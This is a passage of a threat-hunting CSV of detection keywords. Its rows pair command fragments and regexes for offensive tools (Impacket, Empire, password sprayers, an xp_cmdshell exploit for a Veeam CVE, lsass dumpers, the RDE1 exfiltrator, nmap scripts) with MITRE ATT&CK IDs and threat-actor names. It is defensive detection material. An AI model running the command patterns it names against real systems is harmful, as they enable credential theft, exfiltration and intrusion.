-hashes*",".{0,1000}\s\-spn\scifs\/.{0,1000}\s\-hashes.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/SecureAuthCorp/impacket/blob/master/examples/getST.py","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","3312" "* Spoof extensions\Spoofer.exe*",".{0,1000}\sSpoof\sextensions\\Spoofer\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","3313" "* spoofer.py*",".{0,1000}\sspoofer\.py.{0,1000}","offensive_tool_keyword","RITM","python Man in the middle ","T1557.002 - T1040 - T1098.002 - T1557.001 - T1552.001","TA0006 - TA0007 - TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/Tw1sm/RITM","1","0","N/A","N/A","9","3","292","27","2024-11-20T14:27:24Z","2022-10-05T01:10:33Z","3314" "* -SpooferIP *",".{0,1000}\s\-SpooferIP\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. 
the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","Invoke-Tater.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","3315" "* --spoofppid --ppid *",".{0,1000}\s\-\-spoofppid\s\-\-ppid\s.{0,1000}","offensive_tool_keyword","TokenPlayer","Manipulating and Abusing Windows Access Tokens","T1134 - T1484 - T1055 - T1078","TA0004 - TA0005 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S1ckB0y1337/TokenPlayer","1","0","N/A","N/A","10","3","274","45","2021-01-15T16:07:47Z","2020-08-20T23:05:49Z","3316" "* SpoolFool 
*.dll",".{0,1000}\sSpoolFool\s.{0,1000}\.dll","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","3317" "* SpoolFool.ps1*",".{0,1000}\sSpoolFool\.ps1.{0,1000}","offensive_tool_keyword","SpoolFool","Exploit for CVE-2022-21999 - Windows Print Spooler Elevation of Privilege Vulnerability (LPE)","T1068 - T1055 - 
T1059.003","TA0004 - TA0005 - TA0003","","Dispossessor","Privilege Escalation","https://github.com/ly4k/SpoolFool","1","0","N/A","N/A","9","8","788","160","2022-02-09T16:54:09Z","2022-02-08T17:25:44Z","3318" "* spoolsploit *",".{0,1000}\sspoolsploit\s.{0,1000}","offensive_tool_keyword","spoolsploit","A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.","T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","Black Basta","Exploitation tool","https://github.com/BeetleChunks/SpoolSploit","1","0","N/A","N/A","N/A","6","555","90","2021-07-16T04:49:43Z","2021-07-07T00:32:28Z","3319" "* --spray *--shuffle-users*",".{0,1000}\s\-\-spray\s.{0,1000}\-\-shuffle\-users.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","N/A","10","10","1132","128","2025-04-10T13:48:00Z","2022-06-28T00:00:28Z","3320" "* spray -ep ex-plan.s365*",".{0,1000}\sspray\s\-ep\sex\-plan\.s365.{0,1000}","offensive_tool_keyword","Spray365","Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/MarkoH17/Spray365","1","0","N/A","N/A","N/A","4","348","58","2022-07-14T14:45:57Z","2021-11-04T18:20:39Z","3321" "* --spray --passwords *",".{0,1000}\s\-\-spray\s\-\-passwords\s.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential 
Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","N/A","10","10","1132","128","2025-04-10T13:48:00Z","2022-06-28T00:00:28Z","3322" "* --spray --push-locked --months-only --exclude *",".{0,1000}\s\-\-spray\s\-\-push\-locked\s\-\-months\-only\s\-\-exclude\s.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","N/A","10","10","1132","128","2025-04-10T13:48:00Z","2022-06-28T00:00:28Z","3323" "* --spray --push-locked --months-only*",".{0,1000}\s\-\-spray\s\-\-push\-locked\s\-\-months\-only.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","N/A","10","10","1132","128","2025-04-10T13:48:00Z","2022-06-28T00:00:28Z","3324" "* spray -u * -H * -p * -m owa*",".{0,1000}\sspray\s\-u\s.{0,1000}\s\-H\s.{0,1000}\s\-p\s.{0,1000}\s\-m\sowa.{0,1000}","offensive_tool_keyword","spraycharles","Low and slow password spraying tool","T1110.003 - T1110.001","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Tw1sm/spraycharles","1","0","N/A","N/A","10","2","195","32","2025-02-09T03:08:09Z","2018-09-17T11:17:47Z","3325" "* spray -u * -p * -m Office365*",".{0,1000}\sspray\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-m\sOffice365.{0,1000}","offensive_tool_keyword","spraycharles","Low and slow password spraying tool","T1110.003 - T1110.001","TA0006 - TA0009","N/A","N/A","Credential 
Access","https://github.com/Tw1sm/spraycharles","1","0","N/A","N/A","10","2","195","32","2025-02-09T03:08:09Z","2018-09-17T11:17:47Z","3326" "* spray -u * -p * -m Smb -H *",".{0,1000}\sspray\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-m\sSmb\s\-H\s.{0,1000}","offensive_tool_keyword","spraycharles","Low and slow password spraying tool","T1110.003 - T1110.001","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Tw1sm/spraycharles","1","0","N/A","N/A","10","2","195","32","2025-02-09T03:08:09Z","2018-09-17T11:17:47Z","3327" "* spraycharles.py*",".{0,1000}\sspraycharles\.py.{0,1000}","offensive_tool_keyword","spraycharles","Low and slow password spraying tool","T1110.003 - T1110.001","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Tw1sm/spraycharles","1","0","N/A","N/A","10","2","195","32","2025-02-09T03:08:09Z","2018-09-17T11:17:47Z","3328" "* SprayLove.py*",".{0,1000}\sSprayLove\.py.{0,1000}","offensive_tool_keyword","spraykatz","Spraykatz is a tool without any pretention able to retrieve credentials on Windows machines and large Active Directory environments.","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008","TA0003 - TA0004 - TA0007","N/A","N/A","Credential Access","https://github.com/aas-n/spraykatz","1","0","N/A","N/A","9","8","763","121","2020-06-20T12:14:00Z","2019-09-09T14:38:28Z","3329" "* --spraypassword *",".{0,1000}\s\-\-spraypassword\s.{0,1000}","offensive_tool_keyword","SharpHose","Asynchronous Password Spraying Tool in C# for Windows Environments","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/ustayready/SharpHose","1","0","N/A","N/A","10","4","312","62","2023-12-19T21:06:47Z","2020-05-01T22:10:49Z","3330" "* --sql ""EXEC master..xp_cmdshell*",".{0,1000}\s\-\-sql\s\""EXEC\smaster\.\.xp_cmdshell.{0,1000}","offensive_tool_keyword","VeamHax","Exploit for CVE-2023-27532 against Veeam Backup & Replication (Plaintext credential leaking tool)","T1059 
- T1203 - T1040 - T1189 - T1010","TA0001 - TA0002 - TA0009 - TA0011","More_eggs","Akira - FIN6","Exploitation tool","https://github.com/sfewer-r7/CVE-2023-27532","1","0","N/A","N/A","8","2","110","22","2023-03-23T18:03:27Z","2023-03-23T16:08:43Z","3331" "* --sql ""EXEC sp_configure 'xp_cmdshell'*",".{0,1000}\s\-\-sql\s\""EXEC\ssp_configure\s\'xp_cmdshell\'.{0,1000}","offensive_tool_keyword","VeamHax","Exploit for CVE-2023-27532 against Veeam Backup & Replication (Plaintext credential leaking tool)","T1059 - T1203 - T1040 - T1189 - T1010","TA0001 - TA0002 - TA0009 - TA0011","More_eggs","Akira - FIN6","Exploitation tool","https://github.com/sfewer-r7/CVE-2023-27532","1","0","N/A","N/A","8","2","110","22","2023-03-23T18:03:27Z","2023-03-23T16:08:43Z","3332" "* --sql ""EXEC sp_configure 'xp_cmdshell', '1'*",".{0,1000}\s\-\-sql\s\""EXEC\ssp_configure\s\'xp_cmdshell\',\s\'1\'.{0,1000}","offensive_tool_keyword","VeamHax","Exploit for CVE-2023-27532 against Veeam Backup & Replication (Plaintext credential leaking tool)","T1059 - T1203 - T1040 - T1189 - T1010","TA0001 - TA0002 - TA0009 - TA0011","More_eggs","Akira - FIN6","Exploitation tool","https://github.com/sfewer-r7/CVE-2023-27532","1","0","N/A","N/A","8","2","110","22","2023-03-23T18:03:27Z","2023-03-23T16:08:43Z","3333" "* SQLC2.ps1*",".{0,1000}\sSQLC2\.ps1.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. 
PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","0","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","3334" "* SQLDmpr0001.mdmp*",".{0,1000}\sSQLDmpr0001\.mdmp.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","N/A","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","3335" "* SQLITE_DATABASE=chaos *",".{0,1000}\sSQLITE_DATABASE\=chaos\s.{0,1000}","offensive_tool_keyword","chaos","CHAOS is a free and open-source Remote Administration Tool that allow generate binaries to control remote operating systems","T1105 - T1059 - T1021 - T1041 - T1569.002 - T1573","TA0002 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/tiagorlampert/CHAOS","1","0","N/A","N/A","10","10","2483","541","2024-10-26T18:02:45Z","2017-07-11T06:54:56Z","3336" "* SQLITE_DATABASE=chaos*",".{0,1000}\sSQLITE_DATABASE\=chaos.{0,1000}","offensive_tool_keyword","chaos","CHAOS is a free and open-source Remote Administration Tool that allow generate binaries to control remote operating systems","T1105 - T1059 - T1021 - T1041 - T1569.002 - T1573","TA0002 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/tiagorlampert/CHAOS","1","0","N/A","N/A","10","10","2483","541","2024-10-26T18:02:45Z","2017-07-11T06:54:56Z","3337" "* --sql-shell*",".{0,1000}\s\-\-sql\-shell.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - 
TA0002 - TA0005 - TA0007 - TA0042","N/A","Black Basta - Ajax Security Team - APT41 - ENERGETIC BEAR - APT35","Exploitation tool","https://github.com/sqlmapproject/sqlmap","1","0","#linux","N/A","N/A","10","33939","5862","2025-04-05T12:41:50Z","2012-06-26T09:52:15Z","3338" "* srde_arm_musl https -*",".{0,1000}\ssrde_arm_musl\shttps\s\-.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","N/A","10","10","39","6","2025-04-04T18:54:54Z","2023-09-25T20:29:08Z","3339" "* srde_armv7 https -*",".{0,1000}\ssrde_armv7\shttps\s\-.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","N/A","10","10","39","6","2025-04-04T18:54:54Z","2023-09-25T20:29:08Z","3340" "* srde_debug https -*",".{0,1000}\ssrde_debug\shttps\s\-.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","N/A","10","10","39","6","2025-04-04T18:54:54Z","2023-09-25T20:29:08Z","3341" "* srde_linux https -*",".{0,1000}\ssrde_linux\shttps\s\-.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - 
TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","#linux","N/A","10","10","39","6","2025-04-04T18:54:54Z","2023-09-25T20:29:08Z","3342" "* srde_linux_aarch64 https -*",".{0,1000}\ssrde_linux_aarch64\shttps\s\-.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","#linux","N/A","10","10","39","6","2025-04-04T18:54:54Z","2023-09-25T20:29:08Z","3343" "* srde_linux_x86_64 https -*",".{0,1000}\ssrde_linux_x86_64\shttps\s\-.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","#linux","N/A","10","10","39","6","2025-04-04T18:54:54Z","2023-09-25T20:29:08Z","3344" "* srde_macos https -*",".{0,1000}\ssrde_macos\shttps\s\-.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","N/A","10","10","39","6","2025-04-04T18:54:54Z","2023-09-25T20:29:08Z","3345" "* srde_release https -*",".{0,1000}\ssrde_release\shttps\s\-.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","N/A","10","10","39","6","2025-04-04T18:54:54Z","2023-09-25T20:29:08Z","3346" "* srde_windows https 
-*",".{0,1000}\ssrde_windows\shttps\s\-.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","N/A","10","10","39","6","2025-04-04T18:54:54Z","2023-09-25T20:29:08Z","3347" "* srde_windows_x64 https -*",".{0,1000}\ssrde_windows_x64\shttps\s\-.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","N/A","10","10","39","6","2025-04-04T18:54:54Z","2023-09-25T20:29:08Z","3348" "* srde_windows_x86 https -*",".{0,1000}\ssrde_windows_x86\shttps\s\-.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","N/A","10","10","39","6","2025-04-04T18:54:54Z","2023-09-25T20:29:08Z","3349" "* --srdi-obfuscate-imports *",".{0,1000}\s\-\-srdi\-obfuscate\-imports\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","packer bundled","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","3350" "* SRVHOST=127.0.0.1 SRVPORT=4444 RAND=12345*",".{0,1000}\sSRVHOST\=127\.0\.0\.1\sSRVPORT\=4444\sRAND\=12345.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing 
the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","3351" "* -sS -p- --min-rate=* -Pn*",".{0,1000}\s\-sS\s\-p\-\s\-\-min\-rate\=.{0,1000}\s\-Pn.{0,1000}","offensive_tool_keyword","nmap","Nmap (Network Mapper) is a free and open source utility for network discovery and security auditing (stealphy mode)","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Discovery","https://nmap.org/book/nse-usage.html","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3352" "* ssh *@gsocket*",".{0,1000}\sssh\s.{0,1000}\@gsocket.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","3353" "* ssh2-enum-algos.nse*",".{0,1000}\sssh2\-enum\-algos\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3355" "* ssh-auth-methods.nse*",".{0,1000}\sssh\-auth\-methods\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3356" "* ssh-brute.nse*",".{0,1000}\sssh\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3357" "* ssh-hostkey.nse*",".{0,1000}\sssh\-hostkey\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3358" "* ssh-log4shell.nse*",".{0,1000}\sssh\-log4shell\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE scripts to check against log4shell or LogJam vulnerabilities (CVE-2021-44228). NSE scripts check most popular exposed services on the Internet. It is basic script where you can customize payload. 
Nmap (Network Mapper) is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://github.com/Diverto/nse-log4shell","1","0","N/A","N/A","N/A","4","351","49","2021-12-20T15:34:21Z","2021-12-12T22:52:02Z","3359" "* ssh-publickey-acceptance.nse*",".{0,1000}\sssh\-publickey\-acceptance\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3360" "* ssh-run.nse*",".{0,1000}\sssh\-run\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3361" "* sshv1.nse*",".{0,1000}\ssshv1\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3365" "* ssl-ccs-injection.nse*",".{0,1000}\sssl\-ccs\-injection\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3366" "* ssl-cert.nse*",".{0,1000}\sssl\-cert\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - 